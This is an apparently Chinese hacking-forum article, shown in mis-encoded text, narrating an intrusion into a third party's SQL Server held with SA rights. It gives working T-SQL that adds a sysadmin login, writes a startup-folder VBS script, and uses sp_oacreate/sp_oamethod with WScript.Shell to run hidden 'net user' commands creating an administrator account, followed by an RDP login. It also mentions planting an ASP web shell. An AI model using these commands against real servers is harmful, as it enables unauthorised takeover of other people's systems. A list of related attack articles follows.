饒過(guò)Xplog70.dll玩入侵(參考防范)

因?yàn)槭菙?shù)據(jù)庫(kù)是SA權(quán)限連接的,我首先想到的是利用下面的命令:
exec master.dbo.sp_addlogin renwoxin
我的目的是添加數(shù)據(jù)庫(kù)用戶(hù)“renwoxin”,然后將將其加入“Sysadmin”組:
Exec master.dbo.sp_addsrvrolemember renwoxin,sysadmin
然后就可以用祭出我們的“屠庫(kù)寶刀”——SQL查詢(xún)分析器了。開(kāi)始我還抱著一絲僥幸,希望可以通過(guò):
sp_addextendedproc Xp_cmdshell,@dllname='Xplog70.dll'
添加X(jué)p_cmdshell擴(kuò)展過(guò)程??上QL輸出如下:
數(shù)據(jù)庫(kù)中已存在名為Xp_cmdshell 的對(duì)象。
為了確認(rèn)Xp_cmdshell是否被刪除我提交如下語(yǔ)句:
select count(*) from master.dbo.sysobjects where xtype='X' and name=Xp_cmdshell
返回1,看來(lái)并未刪除Xp_cmdshell對(duì)象,那問(wèn)題應(yīng)該是出在Xplog70.dll這個(gè)文件了,也許被改名或者刪除了。
我決定用臭要飯的寫(xiě)的GetWebShell來(lái)寫(xiě)入ASP木馬。工具使用很簡(jiǎn)單,以往的黑防也有介紹過(guò)。我使用后一會(huì)兒就提示寫(xiě)入成功了,但等我高高興興的去訪(fǎng)問(wèn)這個(gè)路徑時(shí),卻提示“找不到網(wǎng)頁(yè)”,郁悶!
百思不得其解,拿出NBSI2,利用Tree list工具列出WEB路徑下的文件,發(fā)現(xiàn)上傳的木馬“安詳”地躺在那兒,可為什么不能訪(fǎng)問(wèn)呢(我現(xiàn)在都還不知道答案,哪位高人知道希望能指點(diǎn)一下),而且錯(cuò)誤提示居然是“找不到文件”?!
我打算放棄了,可這么好的肉雞就這么飛了,實(shí)在心有不甘!到百度一通狂搜,終于找到一篇文章,文中提出了一種方法,用SQL查詢(xún)分析器寫(xiě)入如下指令:
Declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate ’scripting.filesystemobject’, @o out
——這兩行代碼是建立SQL的文本對(duì)象
exec sp_oamethod @o, ’createtextfile’, @f out,’c:\docume~1\alluse~1\「開(kāi)始」菜單\程序\啟動(dòng)\a.vbs’, 1
--在啟動(dòng)菜單里寫(xiě)入a.vbs,當(dāng)然這里只支持中文
exec @ret = sp_oamethod @f, ’writeline’, NULL,’set wshshell=createobject("wscript.shell")’
——單引號(hào)里的都是a.vbs的內(nèi)容,要一行一行的寫(xiě),下同。
exec @ret = sp_oamethod @f, ’writeline’, NULL,’a=wshshell.run ("cmd.exe /c net user user1 123 /add",0)’
exec @ret = sp_oamethod @f, ’writeline’, NULL,’b=wshshell.run ("cmd.exe /c net localgroup administrators user1 /add",0)’
--a.vbs內(nèi)容結(jié)束
按照作者的說(shuō)法,執(zhí)行查循后會(huì)在服務(wù)器的啟動(dòng)程序里寫(xiě)入一個(gè)a.vbs腳本。等服務(wù)器重啟就可以添加一個(gè)user1密碼為123的用戶(hù)??墒且确?wù)器重啟,要到哪一天啊?!
對(duì)著這段代碼是我是上看、下看、左看、右看,你還別說(shuō)真看出點(diǎn)什么了。這個(gè)腳本用Sp_oamethod來(lái)調(diào)用OLE對(duì)象的Writeline方法,突然靈光一閃,我能不能用Sp_oamethod來(lái)執(zhí)行CMD命令呢?趕緊找出“SQL Server聯(lián)機(jī)叢書(shū)”,其中對(duì)Sp_OAMethod描述如下:
sp_OAMethod
調(diào)用 OLE 對(duì)象的方法。
語(yǔ)法
sp_OAMethod objecttoken,
????methodname
????[, returnvalue OUTPUT]
????[ , [ @parametername = ] parameter [ OUTPUT ]
????[...n]]
參數(shù)
objecttoken
是先前用 sp_OACreate 創(chuàng)建的 OLE 對(duì)象令牌。
methodname
是要調(diào)用的 OLE 對(duì)象的方法名。
用WScript.Shell對(duì)象的Run方法來(lái)運(yùn)行Cmd.exe不就可以執(zhí)行Cmd命令了嗎?于是構(gòu)造如下語(yǔ)句:
DECLARE @cmd INT
EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net user renwoxin$ test /add','0','true'
小提示:上面語(yǔ)句的詳細(xì)解釋是:
用Sp_OACreate創(chuàng)建OLE 對(duì)象Wscript.Shell的令牌。
用Sp_oamethod調(diào)用Wscript.Shell的Run方法來(lái)執(zhí)行CMD語(yǔ)句,添加用戶(hù)renwoxin$,密碼為test。“0”和“true”是RUN方法的參數(shù):“0”可選。表示程序窗口外觀(guān)的整數(shù)值,表示語(yǔ)句執(zhí)行時(shí)隱藏CMD窗口,如果不加的話(huà),在服務(wù)器上會(huì)有一個(gè)DOS窗口閃一下,容易暴露;“true”可選。布爾值,表示在繼續(xù)執(zhí)行腳本中的下一條語(yǔ)句之前,腳本是否等待執(zhí)行完程序。如果設(shè)為T(mén)rue,則在執(zhí)行完程序后才執(zhí)行腳本,RUN方法返回由程序返回的任何錯(cuò)誤代碼。如果設(shè)為False(默認(rèn)值),則RUN方法將自動(dòng)在啟動(dòng)程序后立即返回0(不是錯(cuò)誤代碼)。
上面的代碼執(zhí)行后,SQL查詢(xún)分析器返回一個(gè)0值,這表示執(zhí)行成功了,再將renwoxin$提升為管理員:
DECLARE @cmd INT
EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net localgroup administrators renwoxin$ /add','0','true'
這次又返回一個(gè)0值,還等什么,趕快從3389連過(guò)去看看,順利進(jìn)入!大家肯定會(huì)想到這個(gè)RUN可以執(zhí)行幾乎所有的CMD命令,只是如果你要看到結(jié)果,就需要自己構(gòu)造表來(lái)存儲(chǔ)了,大家可以發(fā)揮自己的想象力了!
找到SQL安裝目錄下的Binn文件夾,發(fā)現(xiàn)其中的Xplog70.dll果然被刪除了。再檢查一下,用GetWebShell提交的ASP木馬,內(nèi)容居然是亂碼!反正是不能執(zhí)行,到現(xiàn)在我還是想不通是為什么,希望大俠們能著文傳授。到此文章也該結(jié)束了,希望能盡快看到大俠們的文章。
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來(lái)攻擊頁(yè)面的,大家都有這樣的經(jīng)歷,就是在訪(fǎng)問(wèn)論壇時(shí),如果這個(gè)論壇比較大,訪(fǎng)問(wèn)的人比較多,打開(kāi)頁(yè)面的速度會(huì)比較慢,對(duì)不?!一般來(lái)說(shuō),訪(fǎng)問(wèn)的人越多,論壇的頁(yè)2024-01-06Windows系統(tǒng)安全風(fēng)險(xiǎn)-本地NTLM重放提權(quán)
入侵者主要通過(guò)Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過(guò)程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險(xiǎn)微軟并不認(rèn)為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語(yǔ)句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說(shuō)過(guò)關(guān)于http和https的區(qū)別,對(duì)于加密的https,我們一直認(rèn)為它是相對(duì)安全的,可今天要講的是,一種繞過(guò)HTTPS加密得到明文信息的web攻擊方式,不知道這消息對(duì)你2016-08-10iPhone和Mac也會(huì)被黑 一條iMessage密碼可能就被盜了
一直以來(lái)蘋(píng)果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋(píng)果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會(huì)導(dǎo)致用戶(hù)信息泄露。2016-07-27- 國(guó)家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號(hào)被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤(pán)記錄器進(jìn)入攻擊者郵箱
面對(duì)惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒(méi)有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤(pán)記錄器,進(jìn)入攻擊者郵箱2016-07-06